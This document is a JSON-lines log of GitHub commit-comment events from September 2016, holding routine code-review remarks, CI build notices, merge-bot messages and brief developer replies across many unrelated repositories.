{"id":"4563398365","type":"CommitCommentEvent","actor":{"login":"matthewjackowski"},"repo":{"name":"transifex/transifex-sync-zendesk"},"payload":{"comment":{"id":19023366,"position":8,"line":16,"path":"src/lib/transifex-api/project.js","commit_id":"93a36d4771f131dadcf982ead7847b5e6ba9ab68","created_at":"2016-09-14T17:26:42Z","updated_at":"2016-09-14T17:26:42Z","body":"@nbasili @SofiaMargariti That is correct, this header is for @diegobz to be able to track usage.\r\n\r\nThe framework version can be found in the manifest here: https://github.com/transifex/transifex-sync-zendesk/blob/master/src/manifest.json#L12"}},"created_at":"2016-09-14T17:26:42Z"}
{"id":"4563399733","type":"CommitCommentEvent","actor":{"login":"joaomgcd"},"repo":{"name":"joaomgcd/JoinChrome"},"payload":{"comment":{"id":19023369,"position":null,"line":null,"path":null,"commit_id":"e546fd607084bfdc1bc9000dcd84a5df0a2402c0","created_at":"2016-09-14T17:26:58Z","updated_at":"2016-09-14T17:26:58Z","body":"Thanks Tom! 👍 "}},"created_at":"2016-09-14T17:26:58Z"}
{"id":"4563399952","type":"CommitCommentEvent","actor":{"login":"mtholder"},"repo":{"name":"OpenTreeOfLife/reference-taxonomy"},"payload":{"comment":{"id":19023371,"position":null,"line":null,"path":null,"commit_id":"7904ad7fac929556aae133d1211116bfd0854f82","created_at":"2016-09-14T17:27:00Z","updated_at":"2016-09-14T17:27:00Z","body":"though perhaps it doesn't matter because the find path is `.`\r\n"}},"created_at":"2016-09-14T17:27:00Z"}
{"id":"4563404194","type":"CommitCommentEvent","actor":{"login":"Kevin-Wei"},"repo":{"name":"dchbx/enroll"},"payload":{"comment":{"id":19023384,"position":null,"line":null,"path":null,"commit_id":"8909e473f004fe4f2dbeaf6a1f6ccafa1a66a55a","created_at":"2016-09-14T17:27:49Z","updated_at":"2016-09-14T17:27:49Z","body":"What bug? @jlhicks4925 "}},"created_at":"2016-09-14T17:27:49Z"}
{"id":"4563408369","type":"CommitCommentEvent","actor":{"login":"deads2k"},"repo":{"name":"openshift/origin"},"payload":{"comment":{"id":19023393,"position":null,"line":null,"path":null,"commit_id":"dd643378167de8bd20682a52520cebca7327172d","created_at":"2016-09-14T17:28:34Z","updated_at":"2016-09-14T17:28:34Z","body":"lgetm.  Added followup point to scan controllers for obvious escalations."}},"created_at":"2016-09-14T17:28:34Z"}
{"id":"4563411289","type":"CommitCommentEvent","actor":{"login":"vcunat"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":19023400,"position":null,"line":null,"path":null,"commit_id":"78178d5854901e1b17a14bce3fe43515984b7b91","created_at":"2016-09-14T17:29:07Z","updated_at":"2016-09-14T17:29:07Z","body":"The libsystemd change is very nice. Note however that in parent commit libudev has 23 MiB closure and now it gets to 87 MiB. Why not keep libudev as it was before? I chose copying it because it's easy and the lib only uses ~160 KiB."}},"created_at":"2016-09-14T17:29:07Z"}
{"id":"4563418068","type":"CommitCommentEvent","actor":{"login":"yeshwanthvshenoy"},"repo":{"name":"yeshwanthvshenoy/Zoho-Cracker"},"payload":{"comment":{"id":19023414,"position":null,"line":null,"path":null,"commit_id":"fcc6de7084908fef7afe0b9611d7337973f03705","created_at":"2016-09-14T17:30:23Z","updated_at":"2016-09-14T17:30:23Z","body":"Questions Courtesy : [http://www.geeksforgeeks.org/zoho-interview-set-1-campus/](http://www.geeksforgeeks.org/zoho-interview-set-1-campus/)"}},"created_at":"2016-09-14T17:30:23Z"}
{"id":"4563424860","type":"CommitCommentEvent","actor":{"login":"MMrR0b0TT"},"repo":{"name":"mgp25/Instagram-API"},"payload":{"comment":{"id":19023429,"position":null,"line":null,"path":null,"commit_id":"ee350234c0cb32702969578e552737a3d7213fb7","created_at":"2016-09-14T17:31:38Z","updated_at":"2016-09-14T17:31:38Z","body":"I've seen some news parameters, as those after the usually parameters. Should we add that?\r\n\"module=overview&support_new_api=true\""}},"created_at":"2016-09-14T17:31:38Z"}
{"id":"4563424909","type":"CommitCommentEvent","actor":{"login":"thrawniejoe"},"repo":{"name":"thrawniejoe/TheCakeEmporium"},"payload":{"comment":{"id":19023430,"position":null,"line":null,"path":null,"commit_id":"94338f6bb285fa78d03f679ffcf393cc771bbed9","created_at":"2016-09-14T17:31:39Z","updated_at":"2016-09-14T17:31:39Z","body":"This was a merge, Only changes made on my end was the Validator on Registration.cs"}},"created_at":"2016-09-14T17:31:39Z"}
{"id":"4563424989","type":"CommitCommentEvent","actor":{"login":"Preetam"},"repo":{"name":"VividCortex/docs"},"payload":{"comment":{"id":19023431,"position":null,"line":null,"path":null,"commit_id":"65ca1d80986affce4e33595a788b79e9b273a0f4","created_at":"2016-09-14T17:31:40Z","updated_at":"2016-09-14T17:31:40Z","body":":godmode: "}},"created_at":"2016-09-14T17:31:40Z"}
{"id":"4563428052","type":"CommitCommentEvent","actor":{"login":"deads2k"},"repo":{"name":"openshift/origin"},"payload":{"comment":{"id":19023438,"position":null,"line":null,"path":null,"commit_id":"b6acb2073560ba3a19161ecaf25bb03627134b75","created_at":"2016-09-14T17:32:14Z","updated_at":"2016-09-14T17:32:14Z","body":"lgtm, boring permissions."}},"created_at":"2016-09-14T17:32:14Z"}
{"id":"4563432362","type":"CommitCommentEvent","actor":{"login":"jhudsonWA"},"repo":{"name":"ZipArchive/ZipArchive"},"payload":{"comment":{"id":19023449,"position":null,"line":null,"path":null,"commit_id":"81c8672414855e2de7265b792674d11940f8df23","created_at":"2016-09-14T17:33:02Z","updated_at":"2016-09-14T17:33:02Z","body":"Oops. Then I will remove. Thanks!"}},"created_at":"2016-09-14T17:33:02Z"}
{"id":"4563433877","type":"CommitCommentEvent","actor":{"login":"deads2k"},"repo":{"name":"openshift/origin"},"payload":{"comment":{"id":19023451,"position":null,"line":null,"path":null,"commit_id":"bc18c5c4fa282d34b6fad7b8daee92144d5ceb05","created_at":"2016-09-14T17:33:19Z","updated_at":"2016-09-14T17:33:19Z","body":"lgtm, "}},"created_at":"2016-09-14T17:33:19Z"}
{"id":"4563434753","type":"CommitCommentEvent","actor":{"login":"azoellner"},"repo":{"name":"initOS/odoo"},"payload":{"comment":{"id":19023455,"position":null,"line":null,"path":null,"commit_id":"b5c0e9392c94d579f8b0467f544465674d1528db","created_at":"2016-09-14T17:33:27Z","updated_at":"2016-09-14T17:33:27Z","body":"This is an accident. The number 13450 references a ticket in my company's Mantis system. It's entirely unrelated to your issue on Github with the same number."}},"created_at":"2016-09-14T17:33:27Z"}
{"id":"4563434994","type":"CommitCommentEvent","actor":{"login":"headius"},"repo":{"name":"bundler/bundler"},"payload":{"comment":{"id":19023456,"position":null,"line":null,"path":null,"commit_id":"f8224816f8d7c49ccfb561f4ac5315d423e193cb","created_at":"2016-09-14T17:33:29Z","updated_at":"2016-09-14T17:33:29Z","body":":+1: Better than my suggestion!"}},"created_at":"2016-09-14T17:33:29Z"}
{"id":"4563435452","type":"CommitCommentEvent","actor":{"login":"litmeuplol"},"repo":{"name":"fparma/fp_uniforms"},"payload":{"comment":{"id":19023458,"position":null,"line":null,"path":null,"commit_id":"5fd3f11361904988c8c3a7e07e65b88e0049877b","created_at":"2016-09-14T17:33:34Z","updated_at":"2016-09-14T17:33:34Z","body":"should i bother remaking the monolith camo at a proper size (larger) or should I just forget it"}},"created_at":"2016-09-14T17:33:34Z"}
{"id":"4563435653","type":"CommitCommentEvent","actor":{"login":"deads2k"},"repo":{"name":"openshift/origin"},"payload":{"comment":{"id":19023459,"position":null,"line":null,"path":null,"commit_id":"2061ebcdc0cc13aa8eae8777bb72eabb7c043969","created_at":"2016-09-14T17:33:37Z","updated_at":"2016-09-14T17:33:37Z","body":"lgtm, boring permissions."}},"created_at":"2016-09-14T17:33:37Z"}
{"id":"4563446174","type":"CommitCommentEvent","actor":{"login":"flaviovdf"},"repo":{"name":"flaviovdf/pyksc"},"payload":{"comment":{"id":19023484,"position":null,"line":null,"path":null,"commit_id":"979f1310d8333d08ab3ad893856c37700f5db076","created_at":"2016-09-14T17:35:34Z","updated_at":"2016-09-14T17:35:34Z","body":"Sure, that make's sense. If you send the pull request I'll merge it. Although, it may be good to have both options with a flag. I recall that this book:\r\n\r\nhttp://www.dataminingbook.info\r\n\r\nHas one definition, while this one:\r\n\r\nhttps://dl.acm.org/citation.cfm?id=995032\r\n\r\nHas another. I believe that I'm using the first one (which leads to this confusion)."}},"created_at":"2016-09-14T17:35:34Z"}
{"id":"4563448358","type":"CommitCommentEvent","actor":{"login":"deads2k"},"repo":{"name":"openshift/origin"},"payload":{"comment":{"id":19023491,"position":null,"line":null,"path":null,"commit_id":"aacdf7523e6d05ce448d1db8c1c4f677165a07af","created_at":"2016-09-14T17:35:58Z","updated_at":"2016-09-14T17:35:58Z","body":"lgtm, boring"}},"created_at":"2016-09-14T17:35:58Z"}
{"id":"4563450496","type":"CommitCommentEvent","actor":{"login":"deads2k"},"repo":{"name":"openshift/origin"},"payload":{"comment":{"id":19023500,"position":null,"line":null,"path":null,"commit_id":"e246cbd3f5c4ce9b8f3c0feb184fbd624695d18c","created_at":"2016-09-14T17:36:21Z","updated_at":"2016-09-14T17:36:21Z","body":"lgtm, boring."}},"created_at":"2016-09-14T17:36:21Z"}
{"id":"4563455515","type":"CommitCommentEvent","actor":{"login":"deads2k"},"repo":{"name":"openshift/origin"},"payload":{"comment":{"id":19023513,"position":null,"line":null,"path":null,"commit_id":"bb27132d64479484aecbf47a8d21429738bf241b","created_at":"2016-09-14T17:37:16Z","updated_at":"2016-09-14T17:37:16Z","body":"lgtm, squash to other config changes."}},"created_at":"2016-09-14T17:37:16Z"}
{"id":"4563462532","type":"CommitCommentEvent","actor":{"login":"Fromen8923"},"repo":{"name":"SwerveRoboticsTeams/ftc_app"},"payload":{"comment":{"id":19023534,"position":29,"line":29,"path":"Team6220/src/main/java/org/firstinspires/ftc/team6220/FIRFilter.java","commit_id":"e47f7e40042df674d139032f5f8af07ad2f0261c","created_at":"2016-09-14T17:38:32Z","updated_at":"2016-09-14T17:38:32Z","body":"This will make the entire array be equal to the first value. For loop should go backwards, starting at values.length - 2 to i >= 0."}},"created_at":"2016-09-14T17:38:32Z"}
{"id":"4563462897","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/yokozuna"},"payload":{"comment":{"id":19023535,"position":null,"line":null,"path":null,"commit_id":"a58e8f75dd5cd11e360ac1974534832907e934d6","created_at":"2016-09-14T17:38:36Z","updated_at":"2016-09-14T17:38:36Z","body":"saw approval from paulhenrich\nat https://github.com/basho/yokozuna/commit/a58e8f75dd5cd11e360ac1974534832907e934d6"}},"created_at":"2016-09-14T17:38:36Z"}
{"id":"4563462964","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/yokozuna"},"payload":{"comment":{"id":19023536,"position":null,"line":null,"path":null,"commit_id":"a58e8f75dd5cd11e360ac1974534832907e934d6","created_at":"2016-09-14T17:38:36Z","updated_at":"2016-09-14T17:38:36Z","body":"merging basho/yokozuna/fd-upgradedowngradetest-fix = a58e8f75 into borshop-integration-676-fd-upgradedowngradetest-fix"}},"created_at":"2016-09-14T17:38:36Z"}
{"id":"4563462985","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/yokozuna"},"payload":{"comment":{"id":19023537,"position":null,"line":null,"path":null,"commit_id":"a58e8f75dd5cd11e360ac1974534832907e934d6","created_at":"2016-09-14T17:38:37Z","updated_at":"2016-09-14T17:38:37Z","body":"basho/yokozuna/fd-upgradedowngradetest-fix = a58e8f75 merged ok, testing candidate = a091ce84"}},"created_at":"2016-09-14T17:38:37Z"}
{"id":"4563464561","type":"CommitCommentEvent","actor":{"login":"RedgooseDev"},"repo":{"name":"RedgooseDev/goose"},"payload":{"comment":{"id":19023544,"position":null,"line":null,"path":null,"commit_id":"990d81aa3ed6f33ad9f25c3f3ebe004b4a5e74a1","created_at":"2016-09-14T17:38:54Z","updated_at":"2016-09-14T17:38:54Z","body":"#141 File모듈의 테이블처리에 대해서 마무리 작업했음"}},"created_at":"2016-09-14T17:38:54Z"}
{"id":"4563467421","type":"CommitCommentEvent","actor":{"login":"mattwynne"},"repo":{"name":"cucumber/website"},"payload":{"comment":{"id":19023550,"position":null,"line":null,"path":null,"commit_id":"c4d1f40c5ad0c3e25ed33a39d7cdb48c3239c4bd","created_at":"2016-09-14T17:39:27Z","updated_at":"2016-09-14T17:39:27Z","body":"👍 thanks for the coaching @aslakhellesoy"}},"created_at":"2016-09-14T17:39:27Z"}
{"id":"4563467487","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":19023551,"position":null,"line":null,"path":null,"commit_id":"e449bfc5b5363768ceed914dd2335ab6293b8734","created_at":"2016-09-14T17:39:28Z","updated_at":"2016-09-14T17:39:28Z","body":"The following doc(s) have been deployed to the [1869module](https://1869module-static-docs.pantheonsite.io/docs) Multidev environment:\n- [docs/unsupported-modules-plugins](https://1869module-static-docs.pantheonsite.io/docs/unsupported-modules-plugins)\n"}},"created_at":"2016-09-14T17:39:28Z"}
{"id":"4563470756","type":"CommitCommentEvent","actor":{"login":"deads2k"},"repo":{"name":"openshift/origin"},"payload":{"comment":{"id":19023556,"position":null,"line":null,"path":null,"commit_id":"9809d325a24ffc9d49f8678382f1d52e04423be6","created_at":"2016-09-14T17:40:04Z","updated_at":"2016-09-14T17:40:04Z","body":"lgtm, squash to permissions"}},"created_at":"2016-09-14T17:40:04Z"}
{"id":"4563470852","type":"CommitCommentEvent","actor":{"login":"cyberperson"},"repo":{"name":"cyberperson/cyberperson.github.io"},"payload":{"comment":{"id":19023558,"position":null,"line":null,"path":null,"commit_id":"b95735eb944ea5e57ef91debf87f4f2592254ac6","created_at":"2016-09-14T17:40:06Z","updated_at":"2016-09-14T17:40:06Z","body":"Изначально я думал что, в большей степени, блог будет посвящён моим попыткам заработать в сети, но я понял что это не основная тема моего блога, и давать название блогу выбрав только одну из затрагиваемых тем - как-то неправильно."}},"created_at":"2016-09-14T17:40:06Z"}
{"id":"4563471886","type":"CommitCommentEvent","actor":{"login":"guestcenter-devops"},"repo":{"name":"opentable/gc-microsite-restaurant-search"},"payload":{"comment":{"id":19023560,"position":null,"line":null,"path":null,"commit_id":"088b39c747d5ceda084698db2ecdf8f24cb2a1f5","created_at":"2016-09-14T17:40:17Z","updated_at":"2016-09-14T17:40:17Z","body":"TeamCity Umami :: WebClient :: Sites :: Micro Sites :: GC Microsite - Restaurant Search :: Pull Request Test [Build 29](http://teamcity.otenv.com/viewLog.html?buildId=5211757&buildTypeId=Umami_WebClient_MicroSites_GcMicrositeRestaurantSearch_PullRequestTest) is now running\n"}},"created_at":"2016-09-14T17:40:17Z"}
{"id":"4563472773","type":"CommitCommentEvent","actor":{"login":"deads2k"},"repo":{"name":"openshift/origin"},"payload":{"comment":{"id":19023562,"position":null,"line":null,"path":null,"commit_id":"12470c9c4ca8ef7c2e76b882442b035f3e1471dd","created_at":"2016-09-14T17:40:25Z","updated_at":"2016-09-14T17:40:25Z","body":"lgtm"}},"created_at":"2016-09-14T17:40:25Z"}
{"id":"4563472853","type":"CommitCommentEvent","actor":{"login":"nikhil18"},"repo":{"name":"nikhil18/lightning-kernel-bacon"},"payload":{"comment":{"id":19023565,"position":null,"line":null,"path":null,"commit_id":"f273e11bcf9ef336ff0f24e71d475531da9ef7dd","created_at":"2016-09-14T17:40:26Z","updated_at":"2016-09-14T17:40:26Z","body":"if you find any other rougue commit please report thanks"}},"created_at":"2016-09-14T17:40:26Z"}
{"id":"4563476374","type":"CommitCommentEvent","actor":{"login":"SedarG"},"repo":{"name":"SedarG/corefx"},"payload":{"comment":{"id":19023575,"position":null,"line":null,"path":null,"commit_id":"0f76888c5f0ab22dbbdac5fb5f51524451981bdb","created_at":"2016-09-14T17:41:02Z","updated_at":"2016-09-14T17:41:02Z","body":"@ericstj, would you mind taking a look at these changes and give guidance. This is related with https://github.com/dotnet/corefx/issues/11222. My goal is to unify System.Reflection.Extensions for uap10.1 across aot and non-aot runtimes. "}},"created_at":"2016-09-14T17:41:02Z"}
{"id":"4563480856","type":"CommitCommentEvent","actor":{"login":"guestcenter-devops"},"repo":{"name":"opentable/gc-microsite-restaurant-search"},"payload":{"comment":{"id":19023584,"position":null,"line":null,"path":null,"commit_id":"088b39c747d5ceda084698db2ecdf8f24cb2a1f5","created_at":"2016-09-14T17:41:47Z","updated_at":"2016-09-14T17:41:47Z","body":"TeamCity Umami :: WebClient :: Sites :: Micro Sites :: GC Microsite - Restaurant Search :: Pull Request Test [Build 29](http://teamcity.otenv.com/viewLog.html?buildId=5211757&buildTypeId=Umami_WebClient_MicroSites_GcMicrositeRestaurantSearch_PullRequestTest) outcome was **SUCCESS**\nSummary: Tests passed: 28 Build time: 00:01:30"}},"created_at":"2016-09-14T17:41:47Z"}
{"id":"4563481266","type":"CommitCommentEvent","actor":{"login":"gschueler"},"repo":{"name":"rundeck/rundeck"},"payload":{"comment":{"id":19023586,"position":58,"line":51,"path":"packaging/Makefile","commit_id":"cabe19c5efd7a44d97348a8031fb136152b2bd4e","created_at":"2016-09-14T17:41:52Z","updated_at":"2016-09-14T17:41:52Z","body":"@jbguerraz not sure, maybe it was meant to be `.*.bat$` instead of `$$` "}},"created_at":"2016-09-14T17:41:52Z"}
{"id":"4563482799","type":"CommitCommentEvent","actor":{"login":"Axelm3sh"},"repo":{"name":"SaddlebackCSS/Git_Tutorial"},"payload":{"comment":{"id":19023591,"position":9,"line":9,"path":"RIDDLES.fun.txt","commit_id":"1dec17119e49db13238d1e623bd21daeacd5a7e3","created_at":"2016-09-14T17:42:06Z","updated_at":"2016-09-14T17:42:06Z","body":"`#include <map>`\r\n`#include <string>`\r\n`std::map<std::string, char> question;`\r\n`cout << question.find(\"answer\"); //fixme: don't try this`"}},"created_at":"2016-09-14T17:42:06Z"}
{"id":"4563485657","type":"CommitCommentEvent","actor":{"login":"Fromen8923"},"repo":{"name":"SwerveRoboticsTeams/ftc_app"},"payload":{"comment":{"id":19023599,"position":47,"line":47,"path":"Team6220/src/main/java/org/firstinspires/ftc/team6220/PIDFilter.java","commit_id":"e47f7e40042df674d139032f5f8af07ad2f0261c","created_at":"2016-09-14T17:42:36Z","updated_at":"2016-09-14T17:42:36Z","body":"For loop should go backwards. See other comment."}},"created_at":"2016-09-14T17:42:36Z"}
{"id":"4563485968","type":"CommitCommentEvent","actor":{"login":"dstftw"},"repo":{"name":"rg3/youtube-dl"},"payload":{"comment":{"id":19023601,"position":81,"line":100,"path":"youtube_dl/extractor/adobepass.py","commit_id":"1b6712ab2378b2e8eb59f372fb51193f8d3bdc97","created_at":"2016-09-14T17:42:38Z","updated_at":"2016-09-14T17:42:38Z","body":"This can be checked in `youtube_dl/__init__.py`."}},"created_at":"2016-09-14T17:42:38Z"}
{"id":"4563486936","type":"CommitCommentEvent","actor":{"login":"gryphonmyers"},"repo":{"name":"COCOPi/cockpit"},"payload":{"comment":{"id":19023607,"position":null,"line":null,"path":null,"commit_id":"acf94f67702202dab641aa34fc4e2c91b92588ba","created_at":"2016-09-14T17:42:50Z","updated_at":"2016-09-14T17:42:50Z","body":"I was just about to do a PR with this feature! You beat me to it, hah"}},"created_at":"2016-09-14T17:42:50Z"}
{"id":"4563488962","type":"CommitCommentEvent","actor":{"login":"audy"},"repo":{"name":"audy/richardson-2014"},"payload":{"comment":{"id":19023616,"position":null,"line":null,"path":null,"commit_id":"a31b0b6ed167bec2825de195a5cb412aecfea20c","created_at":"2016-09-14T17:43:13Z","updated_at":"2016-09-14T17:43:13Z","body":"Thanks. You might also want to comment on http://joey711.github.io/waste-not-supplemental/simulation-cluster-accuracy/simulation-cluster-accuracy-server.html where I got the code.\n\n--austin \n\n> On Sep 14, 2016, at 10:12 AM, adriaaula <notifications@github.com> wrote:\n> \n> One little thing,\n> \n> Since you calculate the normalization factors but you doesn't use them for 'normalize' the data your return(physeq) simply retrieves a physeq object with the previous counts + 1.\n> \n> In order to change that, a calculus of the normalization counts has to be done. I have been writing something like that, but it needs to be checked out:\n> \n> Substitute this:\n> \n> counts <- t(z[[1]])\n> \n> For this:\n> \n> lib.size <- z$samples$lib.size\n> lib.size <- lib.size * z$samples$norm.factors\n> counts <- t(z[[1]] *100 /  lib.size)\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n> \n"}},"created_at":"2016-09-14T17:43:13Z"}
{"id":"4563491023","type":"CommitCommentEvent","actor":{"login":"slang800"},"repo":{"name":"iHavee/dockerfiles"},"payload":{"comment":{"id":19023623,"position":4,"line":37,"path":"transmission/Dockerfile","commit_id":"dc6b8231e13ee5d8420b45b775455789b50542a5","created_at":"2016-09-14T17:43:35Z","updated_at":"2016-09-14T17:43:35Z","body":"That's already handled through the `private` flag on a per-torrent basis (see: https://trac.transmissionbt.com/ticket/5127). This just breaks magnetized transfers for public torrents."}},"created_at":"2016-09-14T17:43:35Z"}
{"id":"4563502922","type":"CommitCommentEvent","actor":{"login":"Sami32"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":19023647,"position":null,"line":null,"path":null,"commit_id":"17da2051a089e3e61f56b697c465a2d9e3816c8b","created_at":"2016-09-14T17:45:38Z","updated_at":"2016-09-14T17:45:38Z","body":"@valib Can i add some valib example, avoiding issues like that https://github.com/UniversalMediaServer/UniversalMediaServer/issues/577 ?\r\naudiostream.web,DI Radio=Ambient,http://pub6.di.fm:80/di_ambient\r\naudiostream.web,DI Radio=Big Room House,http://pub3.di.fm:80/di_bigroomhouse\r\nOr any other ones you will like...\r\n"}},"created_at":"2016-09-14T17:45:38Z"}
{"id":"4563503482","type":"CommitCommentEvent","actor":{"login":"gryphonmyers"},"repo":{"name":"COCOPi/cockpit"},"payload":{"comment":{"id":19023648,"position":null,"line":null,"path":null,"commit_id":"23f142141f3f442380ccc64581901118e05e843b","created_at":"2016-09-14T17:45:44Z","updated_at":"2016-09-14T17:45:44Z","body":"Should there be a parameter to opt in or out of this new format? With the new populate flag, some might not need this info."}},"created_at":"2016-09-14T17:45:44Z"}
{"id":"4563503512","type":"CommitCommentEvent","actor":{"login":"bjornfor"},"repo":{"name":"NixOS/nix"},"payload":{"comment":{"id":19023649,"position":null,"line":null,"path":null,"commit_id":"90ad02bf626b885a5dd8967894e2eafc953bdf92","created_at":"2016-09-14T17:45:44Z","updated_at":"2016-09-14T17:45:44Z","body":"Nice!"}},"created_at":"2016-09-14T17:45:44Z"}
{"id":"4563510658","type":"CommitCommentEvent","actor":{"login":"deads2k"},"repo":{"name":"openshift/origin"},"payload":{"comment":{"id":19023665,"position":null,"line":null,"path":null,"commit_id":"6799e3eb1c5e215fcfd73148c83acddefd6950ca","created_at":"2016-09-14T17:47:06Z","updated_at":"2016-09-14T17:47:06Z","body":"lgtm, squash to config."}},"created_at":"2016-09-14T17:47:06Z"}
{"id":"4563515240","type":"CommitCommentEvent","actor":{"login":"grendello"},"repo":{"name":"xamarin/xamarin-android"},"payload":{"comment":{"id":19023677,"position":null,"line":null,"path":null,"commit_id":"3675c5c6a6a5b9f0c65106e7ab5b08358c5fc82a","created_at":"2016-09-14T17:47:55Z","updated_at":"2016-09-14T17:47:55Z","body":"@martinwiboe the \"original\" http client message handler doesn't require caller to escape the URL, we want to be as compatible as possible here. That means we need to do the escaping because Java.Net.URL won't do it for us. UriBuilder does the right thing here. Regarding erroneous ampersands - I think this part should be left to caller to get right"}},"created_at":"2016-09-14T17:47:55Z"}
{"id":"4563515752","type":"CommitCommentEvent","actor":{"login":"deads2k"},"repo":{"name":"openshift/origin"},"payload":{"comment":{"id":19023679,"position":null,"line":null,"path":null,"commit_id":"acd8aac3f65c5e5c1b3c50615fb713841440a693","created_at":"2016-09-14T17:48:00Z","updated_at":"2016-09-14T17:48:00Z","body":"> Really? They're pretty different\r\n\r\nI'd really like to be able to see all the config code changes in one commit.  I'm playing whack-a-mole with \"he forgot X\" and \"did he remember Y\".  However that happens."}},"created_at":"2016-09-14T17:48:00Z"}
{"id":"4563518263","type":"CommitCommentEvent","actor":{"login":"kurtschlueter"},"repo":{"name":"kurtschlueter/Amnesia"},"payload":{"comment":{"id":19023686,"position":null,"line":null,"path":null,"commit_id":"57f39da35c8f8ebde55cc95127e312e348da71c9","created_at":"2016-09-14T17:48:26Z","updated_at":"2016-09-14T17:48:26Z","body":"I should be careful here because I do not want to leave too many components unmounted. I need to work on the routing to make sure jumping is only done when absolutely neccessary"}},"created_at":"2016-09-14T17:48:26Z"}
{"id":"4563527023","type":"CommitCommentEvent","actor":{"login":"vvergu"},"repo":{"name":"metaborg/dynsem"},"payload":{"comment":{"id":19023718,"position":null,"line":null,"path":null,"commit_id":"7f7399fc8d5806c501f9d8c05c870db6f8e06bf0","created_at":"2016-09-14T17:50:03Z","updated_at":"2016-09-14T17:50:03Z","body":"Nice. Thanks."}},"created_at":"2016-09-14T17:50:03Z"}
{"id":"4563531553","type":"CommitCommentEvent","actor":{"login":"zarvox"},"repo":{"name":"liamzdenek/phabricator-sandstorm"},"payload":{"comment":{"id":19023726,"position":4,"line":53,"path":".sandstorm/setup.sh","commit_id":"06b0a09cc73f4d1aa44bed8ee27c07147c320bfd","created_at":"2016-09-14T17:50:53Z","updated_at":"2016-09-14T17:50:53Z","body":"This can probably be made into just a symlink:\r\n\r\n```bash\r\nln -s /usr/lib/git-core/git-http-backend /usr/bin/\r\n```\r\n\r\nIf you prefer not to use a symlink, consider making the script exec the script rather than forking it."}},"created_at":"2016-09-14T17:50:53Z"}
{"id":"4563532520","type":"CommitCommentEvent","actor":{"login":"dtlares"},"repo":{"name":"Federico-leites/sdlAdventuresTetris"},"payload":{"comment":{"id":19023728,"position":5,"line":16,"path":"sdlAdventures/Renderer.cpp","commit_id":"83952fec03afdc8564103e0ed320b9b32541c921","created_at":"2016-09-14T17:51:05Z","updated_at":"2016-09-14T17:51:05Z","body":"Acá el delete debe ser hecho de la siguiente forma:\r\ndelete m_textureManager;\r\nNo hay que utilizar el &."}},"created_at":"2016-09-14T17:51:05Z"}
{"id":"4563536012","type":"CommitCommentEvent","actor":{"login":"gryphonmyers"},"repo":{"name":"COCOPi/cockpit"},"payload":{"comment":{"id":19023740,"position":null,"line":null,"path":null,"commit_id":"acf94f67702202dab641aa34fc4e2c91b92588ba","created_at":"2016-09-14T17:51:43Z","updated_at":"2016-09-14T17:51:43Z","body":"Just noticed this isn't recursive. A link within a linked entry does not resolve"}},"created_at":"2016-09-14T17:51:43Z"}
{"id":"4563536969","type":"CommitCommentEvent","actor":{"login":"dbc2201"},"repo":{"name":"dbc2201/erp-try1"},"payload":{"comment":{"id":19023746,"position":null,"line":null,"path":null,"commit_id":"f20a9811b20974a5b9102cd4400bdd2d41a11a0c","created_at":"2016-09-14T17:51:54Z","updated_at":"2016-09-14T17:51:54Z","body":"testing how to commit changes in github files, by dbc"}},"created_at":"2016-09-14T17:51:54Z"}
{"id":"4563541840","type":"CommitCommentEvent","actor":{"login":"gizzmojr"},"repo":{"name":"leif81/bzkanban"},"payload":{"comment":{"id":19023758,"position":null,"line":null,"path":null,"commit_id":"0dccf79320ce26a890326a664a82c9a51d06bf54","created_at":"2016-09-14T17:52:46Z","updated_at":"2016-09-14T17:52:46Z","body":"meant httpPUT"}},"created_at":"2016-09-14T17:52:46Z"}
{"id":"4563545783","type":"CommitCommentEvent","actor":{"login":"zarvox"},"repo":{"name":"liamzdenek/phabricator-sandstorm"},"payload":{"comment":{"id":19023766,"position":15,"line":63,"path":".sandstorm/setup.sh","commit_id":"06b0a09cc73f4d1aa44bed8ee27c07147c320bfd","created_at":"2016-09-14T17:53:26Z","updated_at":"2016-09-14T17:53:26Z","body":"consider making this `exec /usr/bin/pygmentize \\$@`\r\n\r\nalso consider placing this script under `.sandstorm` and checking it in, and just creating a symlink to e.g. `/opt/app/.sandstorm/pygmentize` here, which makes it easier to modify the script later if need be."}},"created_at":"2016-09-14T17:53:26Z"}
{"id":"4563546533","type":"CommitCommentEvent","actor":{"login":"treviser"},"repo":{"name":"initOS/odoo"},"payload":{"comment":{"id":19023769,"position":null,"line":null,"path":null,"commit_id":"b5c0e9392c94d579f8b0467f544465674d1528db","created_at":"2016-09-14T17:53:35Z","updated_at":"2016-09-14T17:53:35Z","body":"Too bad for me :-)\n\nThanks anyway for your reply.\n\nCheers, trevi\n\ntwanda AG\nErmin Trevisan\nArtherstrasse 19\nCH-6318 Walchwil\nT +41 41 758 1515\nM +41 79 208 7373\nE trevi@twanda.com\nwww.twanda.ch\nwww.ipadweinkarte.twanda.ch\n\n> On 14.09.2016, at 19:33, Andreas Zoellner <notifications@github.com> wrote:\n> \n> This is an accident. The number 13450 references a ticket in my company's Mantis system. It's entirely unrelated to your issue on Github with the same number.\n> \n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n> \n"}},"created_at":"2016-09-14T17:53:35Z"}
{"id":"4563551528","type":"CommitCommentEvent","actor":{"login":"Aster89"},"repo":{"name":"sqwishy/vim-gdscript"},"payload":{"comment":{"id":19023785,"position":null,"line":null,"path":null,"commit_id":"657a9868628342f1cf9df101bfa2ec6ddcf04892","created_at":"2016-09-14T17:54:28Z","updated_at":"2016-09-14T17:54:28Z","body":"Why did you remove noexpandtab?"}},"created_at":"2016-09-14T17:54:28Z"}
